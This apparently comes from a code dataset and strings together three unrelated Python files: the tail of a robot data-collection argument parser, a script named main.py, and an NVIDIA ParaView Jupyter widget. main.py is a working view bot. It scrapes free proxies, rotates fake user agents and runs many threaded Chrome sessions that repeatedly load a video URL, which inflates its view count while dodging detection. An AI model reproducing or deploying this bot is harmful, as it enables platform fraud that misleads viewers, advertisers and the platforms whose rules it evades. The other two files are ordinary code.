parser.add_argument('--heightmap_resolution', dest='heightmap_resolution', type=float, action='store', default=0.002, help='meters per pixel of heightmap')
# ------ Pre-loading and logging options ------
parser.add_argument('--continue_logging', dest='continue_logging', action='store_true', default=False, help='continue logging from previous session?')
parser.add_argument('--logging_directory', dest='logging_directory', action='store')
parser.add_argument('--check', dest='check', action='store_true', default=False)
parser.add_argument('--start_iter', dest='start_iter', type=int, action='store', default=0)
parser.add_argument('--end_iter', dest='end_iter', type=int, action='store', default=50000)
# -------------- Testing options --------------
parser.add_argument('--is_testing', dest='is_testing', action='store_true', default=False)
parser.add_argument('--max_test_trials', dest='max_test_trials', type=int, action='store', default=30, help='maximum number of test runs per case/scenario')
parser.add_argument('--test_preset_cases', dest='test_preset_cases', action='store_true', default=False)
parser.add_argument('--test_preset_file', dest='test_preset_file', action='store', default='new-01.txt')
# Run main program with specified arguments
args = parser.parse_args()
collector = PushDataCollector(args)
if args.check:
collector.push_check(args)
elif args.is_real:
collector.push_data_collect_real(args)
else:
collector.push_data_collect(args)
|
main.py
|
import re
import requests
from os import _exit
from time import sleep
from random import choice,uniform
from threading import Thread
from argparse import ArgumentParser
from selenium import webdriver
from selenium.webdriver.common.proxy import Proxy,ProxyType
from fake_useragent import UserAgent
parser=ArgumentParser()
parser.add_argument('-t','--threads',type=int,help='number of threads',default=15)
parser.add_argument('-u','--url',help='video url',default='',required=True)
parser.add_argument('-d','--duration',help='duration of video in seconds',default=5*60)
parser.add_argument('-p','--proxies',help='proxies list')
args=parser.parse_args()
def bot(url):
try:
while True:
proxy.http_proxy=choice(proxies)
proxy.ssl_proxy=proxy.http_proxy
print(proxy.http_proxy)
chrome_options.add_argument('user-agent="{}"'.format(agent.random))
capabilities=webdriver.DesiredCapabilities.CHROME
proxy.add_to_capabilities(capabilities)
driver=webdriver.Chrome(options=chrome_options,desired_capabilities=capabilities)
driver.get(args.url)
sleep(args.duration)
driver.close()
except:
_exit(0)
if args.proxies:
proxies=open(args.proxies,'r').read().split('\n')
else:
proxies=re.findall(re.compile('<td>([\d.]+)</td>'),str(requests.get('https://free-proxy-list.net/').content))
proxies=['%s:%s'%x for x in list(zip(proxies[0::2],proxies[1::2]))]
print('%d proxies successfully loaded!'%len(proxies))
proxy=Proxy()
proxy.proxy_type=ProxyType.MANUAL
agent=UserAgent()
chrome_options=webdriver.ChromeOptions()
chrome_options.add_argument('--mute-audio')
for i in range(args.threads):
t=Thread(target=bot,args=(args.url,))
t.deamon=True
t.start()
sleep(uniform(1.5,3.0))
|
widgets.py
|
###############################################################################
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# for jpeg / png transfer ("compress frames"):
import base64
import threading
import time
from io import BytesIO
import ipywidgets as widgets
import numpy as np
from PIL import Image
from traitlets import Bytes, Float, Tuple, Unicode
# Functions for handling camera interaction
from .camera_models import (
rotateCameraTurntable,
panCameraTurntable,
zoomCameraTurntable,
)
@widgets.register
class PVDisplay(widgets.DOMWidget):
"""A ParaView interactive render widget"""
_view_name = Unicode("PVDisplayView").tag(sync=True)
_model_name = Unicode("PVDisplayModel").tag(sync=True)
_view_module = Unicode("ipyparaview").tag(sync=True)
_model_module = Unicode("ipyparaview").tag(sync=True)
_view_module_version = Unicode("^0.1.2").tag(sync=True)
_model_module_version = Unicode("^0.1.2").tag(sync=True)
# traitlets -- variables synchronized with front end
frame = Bytes().tag(sync=True)
compressedFrame = Bytes().tag(sync=True)
resolution = Tuple((800, 500)).tag(sync=True) # canvas resolution; w,h
fpsLimit = Float(60.0).tag(sync=True) # maximum render rate
maxEventRate = Float(20.0).tag(sync=True) # maximum number of mouse events/s
# class variables
instances = dict()
rotateScale = 5.0
zoomScale = 0.05
@classmethod
def GetOrCreate(cls, ren, runAsync=True, **kwargs):
"""
Check if a PVDisplay instance already exists for the renderer. If yes, return that instance; otherwise, create a new one.
"""
instance = cls.instances.get(ren, None)
if instance is None:
instance = PVDisplay(ren, runAsync, **kwargs)
cls.instances.update({ren: instance})
return instance
def __init__(self, ren, runAsync=True, compressFrames=False, **kwargs):
# see if we can import Dask.distributed, then try guessing the render
# mode based on the type of ren. Fallback to regular Jupyter rendering
# otherwise
try:
import dask.distributed as distributed
if type(ren) == list and type(ren[0]) == distributed.actor.Actor:
self.mode = "Dask"
else:
self.mode = "Jupyter"
except ImportError:
self.mode = "Jupyter"
if self.mode == "Jupyter" and ren in PVDisplay.instances:
raise RuntimeError(
f"A PVDisplay instance already exists for this renderer. Use PVDisplay.GetOrCreate() to avoid this error."
)
super(PVDisplay, self).__init__(**kwargs) # must call super class init
# regular vars
self.compressFrames = compressFrames
self.pvs, self.renv, self.w2i = (
None,
None,
None,
) # used for Jupyter kernel rendering
self.master, self.renderers = None, [] # used for Dask rendering
self.tp = time.time() # time of latest render
self.fps = 10.0
self.fpsOut = [] # FPS output ipywidgets; passed in from Jupyter
self.intyld = [0.05, 0.01] # interaction yield--period and duration
self.tiy = time.time() # time of last interaction yield
if self.mode == "Dask":
self.renderers = ren
self.master = [r for r in self.renderers if r.rank == 0][0]
self.resolution = tuple(
self.master.run(lambda self: list(self.renv.ViewSize), []).result()
)
cf = self.master.run(
lambda self: list(self.renv.CameraFocalPoint), []
).result()
cp = self.master.run(
lambda self: list(self.renv.CameraPosition), []
).result()
self.camf = (cf[0], cf[1], cf[2])
self.camp = (cp[0], cp[1], cp[2])
else:
import paraview.simple as pvs
self.pvs = pvs
self.renv = ren
self.resolution = tuple(self.renv.ViewSize)
cf = self.renv.CameraFocalPoint
cp = self.renv.CameraPosition
self.camf = (cf[0], cf[1], cf[2])
self.camp = (cp[0], cp[1], cp[2])
import vtk
from vtk import vtkWindowToImageFilter
self.w2i = vtkWindowToImageFilter()
self.w2i.ReadFrontBufferOff()
self.w2i.ShouldRerenderOff()
self.w2i.SetInput(self.renv.SMProxy.GetRenderWindow())
self.frameNum = 0
self.FRBufSz = 10
self.FRBuf = np.zeros(self.FRBufSz, dtype=np.float32)
self.runAsync = runAsync
if runAsync:
self.renderThread = threading.Thread(target=self.__renderLoop)
self.renderThread.start()
# FIXME: starting the render loop thread outside of __init__ seems to create
# a copy of the paraview.simple object, rather than using the one that's
# part of the PVDisplay state; this causes PV to crash
# def setAsync(self, on):
# if on and not self.runAsync:
# self.runAsync = on
# self.renderThread = threading.Thread(target=self.__renderLoop)
# self.renderThread.start()
# elif not on and self.runAsync:
# self.runAsync = False
def addFPSDisplay(self, *w):
"""Add a widget to write FPS to"""
for o in w:
self.fpsOut.append(o)
def updateCam(self):
self.render()
def render(self):
if self.runAsync:
return
else:
tc = time.time()
if 1.0 / (tc - self.tp) < self.fpsLimit:
self.__renderFrame()
def fetchFrame(self):
if self.mode == "Dask":
return self.master.fetchFrame().result()
else:
# Mathias's magic frame fetching snippet
self.w2i.Modified()
self.w2i.Update()
imagedata = self.w2i.GetOutput()
w, h, _ = imagedata.GetDimensions()
from vtk.util.numpy_support import vtk_to_numpy
imagedata_np = vtk_to_numpy(imagedata.GetPointData().GetScalars()).reshape(
(h, w, 3)
)
return np.flipud(
np.pad(
imagedata_np,
((0, 0), (0, 0), (0, 1)),
mode="constant",
constant_values=255,
)
)
def _handle_custom_msg(self, content, buffers):
self.content = content
if content["event"] == "updateCam":
self.updateCam()
if content["event"] == "rotate":
self.__rotateCam(content["data"])
if content["event"] == "pan":
self.__panCam(content["data"])
if content["event"] == "zoom":
self.__zoomCam(content["data"])
def __rotateCam(self, mouseDelta):
# rotates the camera around the focus in spherical
phiLim = 1.5175
if self.mode == "Dask":
from dask.distributed import wait
wait(
[
r.rotateCam(mouseDelta, self.rotateScale, phiLim)
for r in self.renderers
]
)
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = rotateCameraTurntable(
mouseDelta,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
self.rotateScale,
phiLim,
)
self.render()
def __panCam(self, mouseDelta):
# moves the camera with a 1:1 relation to current focal point
if self.mode == "Dask":
from dask.distributed import wait
wait([r.panCam(mouseDelta) for r in self.renderers])
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = panCameraTurntable(
mouseDelta,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
self.renv.CameraViewAngle,
)
self.render()
def __zoomCam(self, mouseDelta):
# zooms by scaling the distance between camera and focus
rlim = 0.00001 # minimum allowable radius
d = (1.0 + self.zoomScale) ** mouseDelta
if self.mode == "Dask":
from dask.distributed import wait
wait([r.zoomCam(d, rlim) for r in self.renderers])
else:
(
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
) = zoomCameraTurntable(
d,
self.renv.CameraPosition,
self.renv.CameraFocalPoint,
self.renv.CameraViewUp,
rlim,
)
self.render()
def __compressFrame(self, frame):
img = Image.fromarray(frame[:, :, :3])
bytesIO = BytesIO()
img.save(bytesIO, format="jpeg", quality=50)
img_str = base64.b64encode(bytesIO.getvalue())
return img_str
def __renderFrame(self):
tc = time.time()
self.FRBuf[self.frameNum % self.FRBufSz] = 1.0 / (tc - self.tp)
self.tp = tc
# set the camera position, render, and get the output frame
if self.mode == "Dask":
from dask.distributed import wait
wait([r.render() for r in self.renderers])
else:
self.pvs.Render(view=self.renv)
uncompressedFrameNp = self.fetchFrame()
if self.compressFrames:
self.compressedFrame = self.__compressFrame(uncompressedFrameNp)
else:
self.frame = uncompressedFrameNp.tostring()
self.frameNum += 1
self.fps = np.average(self.FRBuf)
if self.fpsOut is not None:
for fo in self.fpsOut:
fo.value = self.fps
def __renderLoop(self):
while self.runAsync:
# check if it's time for an interaction yield; if so, do it
if time.time() - self.tiy > self.intyld[0]:
time.sleep(self.intyld[1])
self.tiy = time.time()
# sleep to keep FPS to fpsLimit
time.sleep(max(0, 1.0 / self.fpsLimit - (time.time() - self.tp)))
self.__renderFrame()
@widgets.register
class VStream(widgets.DOMWidget):
"""A WebSocket-based video stream widget with interaction."""
_view_name = Unicode("VStreamView").tag(sync=True)
_model_name = Unicode("VStreamModel").tag(sync=True)
_view_module = Unicode("ipyparaview").tag(sync=True)
_model_module = Unicode("ipyparaview").tag(sync=True)
_view_module_version = Unicode("^0.1.2").tag(sync=True)
_model_module_version = Unicode("^0.1.2").tag(sync=True)
url = Unicode("ws://localhost:9002").tag(sync=True)
state = Unicode("").tag(sync=True)
def connect(self):
self.state = "connect"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.